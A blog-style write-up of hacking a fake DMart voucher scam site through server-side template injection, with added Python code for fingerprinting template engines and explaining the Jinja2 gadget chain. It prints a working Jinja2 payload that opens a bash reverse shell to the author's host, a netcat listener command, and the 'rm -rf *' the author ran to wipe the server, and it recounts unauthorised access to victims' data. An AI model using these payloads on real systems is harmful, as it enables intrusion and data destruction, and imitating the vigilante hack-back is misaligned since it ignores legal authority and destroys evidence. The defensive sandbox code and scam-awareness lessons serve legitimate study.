How I Hacked a Fake DMart Website
In March 2025, I came across a WhatsApp message being circulated widely. It claimed that DMart was offering free vouchers as part of a celebration. Curious and suspicious, I clicked on the link. It led me to a domain hosted on servio.io—clearly not DMart’s official website.
Scam Structure & User Journey
The landing page mimicked DMart branding and offered a fake promotional giveaway. Here’s how the scam was set up to manipulate users:
- Users were asked to answer three simple questions.
- Then they were told to choose one of the three mystery gift boxes.
- To receive their gift, users were forced to share the link with at least 5 WhatsApp contacts or groups.
It was clear this was a social engineering tactic to spread the scam virally. I decided to investigate further and try bypassing the sharing step using browser developer tools. The share requirement was enforced only by JavaScript running in the browser, so by changing its state from the console I reached the fake reward page directly, without sharing anything.
Reconnaissance & Exploit Hunting
I began testing the site using different vectors to find a potential vulnerability. Some of the methods I tried:
- Admin panel brute-forcing
- SQL injection in input fields
- Testing for insecure HTTP methods like PUT or TRACE
- Directory and file enumeration
None of these yielded results. But response headers and error patterns hinted that the backend might be Node.js and that it rendered pages through a templating engine. (The payload that eventually worked is a Jinja2 gadget chain, so the server was in fact Python-based; the templating hint was the part that mattered.) This opened the door to trying Server-Side Template Injection (SSTI).
SSTI Vulnerability Confirmed
I injected the following payload in a user input field:
karthi{{7*7}}
To my surprise, the page rendered karthi49, confirming SSTI: the server had evaluated 7*7 inside the template instead of treating my input as literal text. Expression evaluation inside the template engine is the foothold; turning it into code execution on the server is the next step.
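The karthi{{7*7}} probe works because the canary prefix makes the evaluated value easy to spot wherever the page echoes the input. The following is an added example (not code from the original post) that generalises that check: it sends a small set of arithmetic probes for different template syntaxes, looks for the canary in each response, and classifies every probe as evaluated, reflected literally, or stripped. The {{7*'7'}} probe separates Jinja2 (Python string repetition gives 7777777) from Twig (numeric coercion gives 49). The sample responses at the bottom are constructed to imitate a Jinja2 backend; no requests are made.

```python
"""SSTI fingerprinting with a canary prefix (added example, not from the original post)."""
import html

CANARY = "karthi"  # prefix so the evaluated output is easy to locate in the page

# (probe, what an evaluating engine renders in its place, engine family it points to)
PROBES = [
    ("{{7*7}}",    "49",      "Jinja2/Twig/Nunjucks-style {{ }}"),
    ("{{7*'7'}}",  "7777777", "Jinja2 (Python string repetition)"),
    ("{{7*'7'}}",  "49",      "Twig (numeric coercion)"),
    ("${7*7}",     "49",      "FreeMarker/Velocity-style ${ }"),
    ("<%= 7*7 %>", "49",      "ERB/EJS-style <%= %>"),
]


def build_probes(canary=CANARY):
    """Payloads to submit in the input field, one per distinct probe string."""
    return sorted({canary + probe for probe, _, _ in PROBES})


def fingerprint(responses, canary=CANARY):
    """responses: {probe string: response body}.

    Returns (engines, verdicts): the engine families whose expected evaluation
    appeared right after the canary, and a per-probe verdict of
    'evaluated', 'reflected literally' or 'stripped/encoded'.
    """
    engines, verdicts = set(), {}
    for probe, expected, engine in PROBES:
        body = responses.get(probe)
        if body is None:
            continue
        text = html.unescape(body)  # an HTML-escaped echo is still a literal echo
        if canary + expected in text:
            engines.add(engine)
            verdicts[probe] = "evaluated"
        elif canary + probe in text:
            verdicts[probe] = "reflected literally"
        else:
            verdicts.setdefault(probe, "stripped/encoded")
    return engines, verdicts


# Constructed sample: what a Flask/Jinja2 page would send back for each probe.
SAMPLE_JINJA2 = {
    "{{7*7}}":    "<p>Hi karthi49, pick a box!</p>",
    "{{7*'7'}}":  "<p>Hi karthi7777777, pick a box!</p>",
    "${7*7}":     "<p>Hi karthi${7*7}, pick a box!</p>",
    "<%= 7*7 %>": "<p>Hi karthi&lt;%= 7*7 %&gt;, pick a box!</p>",
}

if __name__ == "__main__":
    print("probes to send:", build_probes())
    found, per_probe = fingerprint(SAMPLE_JINJA2)
    print("engines:", found)
    print("verdicts:", per_probe)
```

In a real test the `responses` dict is filled by submitting each string from `build_probes()` through the form and capturing the page that echoes it; only the classification is shown here.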
Executing a Reverse Shell
To explore further, I crafted a reverse shell payload through the SSTI. The Jinja2 expression below walks from Flask's config object to Python's os module and calls popen on a bash reverse shell; I used Netcat on my VPS (for example nc -lvnp MY_PORT) to listen for the connection. MY_IP, MY_PORT and IP_ADDRESS are placeholders for the real values:
{
"name": "{{config.__class__.__init__.__globals__['os'].popen('bash -c \"bash -i >& /dev/tcp/MY_IP/MY_PORT 0>&1\"').read()}}",
"age": "24",
"ip": "IP_ADDRESS",
"gender": "male"
}
Once the payload was submitted and triggered, I gained a reverse shell into the fake website's server. One detail worth knowing: popen(...).read() blocks until the spawned bash exits, so the HTTP request that delivered the payload simply hangs for as long as the shell session stays open.
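Why does config.__class__.__init__.__globals__['os'] reach the operating system? The following is an added example (not Flask's code and not from the original post) with a stand-in Config class that has the two properties the gadget chain relies on: its __init__ is a Python-level function, and it is defined in a module that imported os, so that function's __globals__ dictionary contains the os module. The same walk is then attempted through a lookup modelled on jinja2.sandbox.SandboxedEnvironment, which refuses dunder attributes; the is_internal_attribute function here is a simplified re-implementation of that policy, not the library itself. The command run through the chain is a harmless echo.

```python
"""How the Flask/Jinja2 SSTI gadget chain reaches os (added example, not Flask's code)."""
import os  # any module that imports os exposes it via the __globals__ of functions defined here
import types


class Config(dict):
    """Stand-in for flask.config.Config: a dict subclass whose __init__ is a plain
    Python function defined in a module that imports os (flask/config.py does both)."""

    def __init__(self, root_path, defaults=None):
        super().__init__(defaults or {})
        self.root_path = root_path


# The payload's path, step by step: attribute names, or ('item', key) for a subscript.
GADGET_CHAIN = ["__class__", "__init__", "__globals__", ("item", "os")]


def walk_chain(root, path):
    """Follow the chain the way an unsandboxed Jinja2 environment does: getattr
    for attributes, [] for subscripts. Starting from any Config instance this
    ends at the os module without the template ever saying 'import'."""
    obj = root
    for step in path:
        if isinstance(step, tuple):
            obj = obj[step[1]]
        else:
            obj = getattr(obj, step)
    return obj


def popen_via_chain(config, command):
    """Run `command` exactly as the SSTI payload does, via os reached through the chain."""
    os_module = walk_chain(config, GADGET_CHAIN)
    return os_module.popen(command).read()


# --- hardened lookup, modelled on jinja2.sandbox (simplified re-implementation) ---
UNSAFE_FUNCTION_ATTRIBUTES = {"__closure__", "__code__", "__globals__"}


class SandboxViolation(Exception):
    pass


def is_internal_attribute(obj, attr):
    """True for attributes a sandboxed environment must never hand to a template."""
    if isinstance(obj, types.FunctionType) and attr in UNSAFE_FUNCTION_ATTRIBUTES:
        return True
    if isinstance(obj, type) and attr == "mro":
        return True
    return attr.startswith("__")


def sandboxed_walk(root, path):
    """Same walk, but every attribute access is policed; the gadget chain dies
    at its first step because __class__ is a dunder attribute."""
    obj = root
    for step in path:
        if isinstance(step, tuple):
            obj = obj[step[1]]
        else:
            if is_internal_attribute(obj, step):
                raise SandboxViolation(
                    f"access to attribute {step!r} of {type(obj).__name__} object is unsafe")
            obj = getattr(obj, step)
    return obj


if __name__ == "__main__":
    cfg = Config("/srv/app")
    print("chain ends at:", walk_chain(cfg, GADGET_CHAIN).__name__)
    print("popen via chain:", popen_via_chain(cfg, "echo ssti").strip())
    try:
        sandboxed_walk(cfg, GADGET_CHAIN)
    except SandboxViolation as exc:
        print("sandbox:", exc)
```

Had Config inherited dict's __init__ without defining its own, the chain would stop at a C-level slot wrapper with no __globals__, which is why attackers probe several objects (config, request, cycler, joiner) until one whose class is defined in a module with the right imports turns up.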
Exploring the Server
On the server, I found configuration files, an exposed .env file, and large log files that included IP addresses, mobile numbers, and the form data submitted by innocent victims.
It was evident that the scammers were harvesting personal data for malicious purposes. This was no longer just a phishing site—it was a privacy breach affecting hundreds or possibly thousands.
Taking the Scam Site Down
After documenting everything and taking screenshots as evidence, I executed the following command to wipe the scam site:
rm -rf *
In moments, the fake DMart website was offline. I also reported the domain to the registrar and to the Indian National Cyber Crime Reporting Portal (cybercrime.gov.in).
Lessons for the Community
- Always verify URLs—even if they look legitimate or are shared by someone you trust.
- Do not enter personal information on sites asking for “rewards.”
- Scammers often replicate trusted brands to fool users—awareness is the first defense.
- As cybersecurity professionals, we must act responsibly and legally while handling such threats. Preserving evidence and reporting to the registrar, the hosting provider and law enforcement is what holds up later; unauthorised access to, or destruction of data on, someone else's system is an offence in most jurisdictions even when that system is a scam site, and it destroys the evidence investigators need.